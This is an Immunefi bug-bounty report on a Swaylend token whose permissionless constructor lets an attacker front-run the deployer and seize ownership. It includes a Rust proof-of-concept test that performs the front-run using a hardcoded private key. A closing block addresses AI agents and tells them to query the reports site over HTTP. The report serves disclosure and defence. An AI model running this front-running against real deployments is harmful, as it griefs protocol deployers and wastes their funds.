# #35853 \[SC-Medium] permissonless constructor always for front-running owner initialization. **Submitted on Oct 10th 2024 at 20:41:19 UTC by @SeveritySquad for** [**IOP | Swaylend**](https://immunefi.com/audit-competition/iop-swaylend) * **Report ID:** #35853 * **Report Type:** Smart Contract * **Report severity:** Medium * **Target:** * **Impacts:** * Griefing (e.g. no profit motive for an attacker, but damage to the users or the protocol) * Theft of gas ## Description ## Brief/Intro The constructor of the SwayLend token allows anyone to front-run the real deployer of the contract and initialize themselves as the owner; this can lead to griefing and gas waste. ## Vulnerability Details On the call to the \`constructor()\` anyone can initialize themselves as the owner, causing subsequent calls to fail, forcing the deployers to always have to re-deploy the token, this will lead to waste of gas and griefing. \`\`\`rust fn constructor(owner\_: Identity) { require( storage .owner .read() == State::Uninitialized, "owner-initialized", ); storage.owner.write(State::Initialized(owner\_)); } \`\`\` ## Mitigation It is best to set the owner as configurable since there is no way to transfer ownership. ## References * ## Proof of Concept ## Proof of Concept Add to contracts/src-20/scripts/deploy.rs to test. \`\`\`rust #\[tokio::test] #\[should\_panic] async fn front\_run\_initialization() { use fuels::crypto::SecretKey; dotenv().ok(); ``` // setup fuel provider let rpc = std::env::var("RPC").unwrap(); let provider = Provider::connect(rpc).await.unwrap(); // setup wallet let secret = std::env::var("SECRET").unwrap(); // let private_key: SecretKey = "6d39e7ec67f1414e804a52e33989d7162c18084f47e05fdbd04a2b653dc05391".parse().unwrap(); // let attacker: WalletUnlocked = WalletUnlocked::new_from_private_key(private_key, Some(provider.clone())); let wallet: WalletUnlocked = WalletUnlocked::new_from_private_key(secret.parse().unwrap(), Some(provider.clone())); // deploy token let configurables = TokenConfigurables::default(); let root = PathBuf::from(env!("CARGO_WORKSPACE_DIR")); let bin_path = root.join("contracts/src-20/out/debug/src-20.bin"); let config = LoadConfiguration::default().with_configurables(configurables); let mut rng = rand::thread_rng(); let salt = rng.gen::<[u8; 32]>(); let id = Contract::load_from(bin_path, config) .unwrap() .with_salt(salt) .deploy(&wallet, TxPolicies::default()) .await .unwrap(); let instance = Token::new(id.clone(), wallet.clone()); let private_key: SecretKey = "6d39e7ec67f1414e804a52e33989d7162c18084f47e05fdbd04a2b653dc05391" .parse() .unwrap(); let attacker: WalletUnlocked = WalletUnlocked::new_from_private_key(private_key, Some(provider.clone())); // simulate an attacker frontrunning the owners call to constructor. instance .clone() .with_account(attacker.clone()) .methods() .constructor(wallet.address().into()) .call() .await .unwrap(); // on the call to contructor by owner, the call will always fail. instance .methods() .constructor(wallet.address().into()) .call() .await .unwrap(); ``` } \`\`\` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://reports.immunefi.com/swaylend_iop/35853-sc-medium-permissonless-constructor-always-for-front-running-owner-initialization..md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.